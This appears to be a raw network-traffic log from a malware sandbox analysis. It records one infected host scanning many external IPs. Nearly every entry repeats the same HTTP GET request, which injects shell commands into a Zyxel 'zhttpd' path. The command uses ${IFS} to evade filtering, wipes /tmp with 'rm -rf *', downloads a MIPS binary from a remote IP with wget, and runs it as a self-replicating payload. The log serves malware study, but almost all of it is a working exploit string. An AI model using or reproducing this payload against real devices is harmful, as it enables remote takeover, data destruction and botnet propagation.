                              Mar 31, 2024 08:41:25.826004028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4195192.168.2.1356168122.178.128.33443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.826024055 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4196192.168.2.1359412162.181.249.20443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.826067924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4197192.168.2.1354374160.197.193.201443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.826114893 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4198192.168.2.1354212194.152.49.135443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.826159954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4199192.168.2.134461649.230.147.109443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.826210976 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4200192.168.2.134845632.205.183.238443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.826246977 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4201192.168.2.135511846.25.92.173443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.826292038 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4202192.168.2.1352836173.134.239.219443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.826320887 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4203192.168.2.135233020.46.102.88443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.826379061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4204192.168.2.1337164200.97.95.146443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.826416016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4205192.168.2.135831461.44.250.24443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.826453924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4206192.168.2.1347034198.17.43.105443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.826472998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4207192.168.2.134434435.200.94.86443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.826505899 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4208192.168.2.1352292122.98.215.50443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.826535940 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4209192.168.2.1340834157.184.128.108443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.826605082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4210192.168.2.1352966206.207.1.195443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.826630116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4211192.168.2.1345966124.219.149.55443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.826646090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4212192.168.2.135694820.141.238.162443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.826699972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4213192.168.2.1344400144.62.73.64443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.826750994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4214192.168.2.134385498.193.8.65443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.826786041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4215192.168.2.1346670190.174.142.99443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.826808929 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4216192.168.2.134434694.18.95.144443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.826864004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4217192.168.2.1356402220.19.67.48443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.826917887 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4218192.168.2.1352046157.152.108.54443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.826942921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4219192.168.2.13401041.49.57.171443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.826986074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4220192.168.2.1340384177.65.44.220443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.827035904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4221192.168.2.134187278.211.243.16443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.827035904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4222192.168.2.1352522191.131.169.81443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.827095032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4223192.168.2.1343196107.149.155.141443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.827132940 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4224192.168.2.134850418.196.58.225443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.827164888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4225192.168.2.136071867.194.10.140443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.827208996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4226192.168.2.1355754125.113.123.118443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.827267885 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4227192.168.2.1334050125.163.196.37443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.827290058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4228192.168.2.134248463.191.158.142443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.827339888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4229192.168.2.13426849.109.142.211443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.827366114 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4230192.168.2.133934425.105.145.227443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.827418089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4231192.168.2.1355074169.161.192.31443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.827457905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4232192.168.2.1356074200.54.112.121443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.827495098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4233192.168.2.134486834.78.250.239443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.827523947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4234192.168.2.1337986192.185.137.103443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.827590942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4235192.168.2.134471468.233.207.124443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.827624083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4236192.168.2.1353140189.10.95.195443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.827668905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4237192.168.2.1345624171.148.105.146443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.827711105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4238192.168.2.1348402167.247.116.41443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.827748060 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4239192.168.2.1346916187.92.251.148443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.827780962 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4240192.168.2.1341718157.198.247.89443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.827826023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4241192.168.2.1346734143.231.17.237443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.827869892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4242192.168.2.133364498.229.182.140443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.827898979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4243192.168.2.1339124221.210.82.26443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.827934980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4244192.168.2.134982894.175.140.46443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.827992916 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4245192.168.2.133995243.246.153.229443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.828022957 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4246192.168.2.133864838.52.7.238443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.828058958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4247192.168.2.1360186211.86.139.241443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.828098059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4248192.168.2.135638087.15.71.207443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.828126907 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4249192.168.2.1348574190.73.166.140443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.828186035 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4250192.168.2.133454857.199.174.105443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.828248978 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4251192.168.2.134333638.220.132.215443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.828274965 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4252192.168.2.136042471.242.0.186443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.828305006 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4253192.168.2.1356222175.244.207.210443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.828363895 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4254192.168.2.133891443.220.92.47443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.828408957 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4255192.168.2.136035839.26.26.198443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.828430891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4256192.168.2.134208214.121.182.147443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.828476906 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4257192.168.2.1353548219.252.225.84443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.828500032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4258192.168.2.134288052.154.185.247443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.828531981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4259192.168.2.133975486.114.111.98443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.828572989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4260192.168.2.134225260.14.219.86443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.828600883 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4261192.168.2.133508817.99.139.204443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.828660011 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4262192.168.2.1339750188.235.194.85443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.828685999 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4263192.168.2.1358210100.182.201.100443
                              TimestampBytes transferredDirectionData
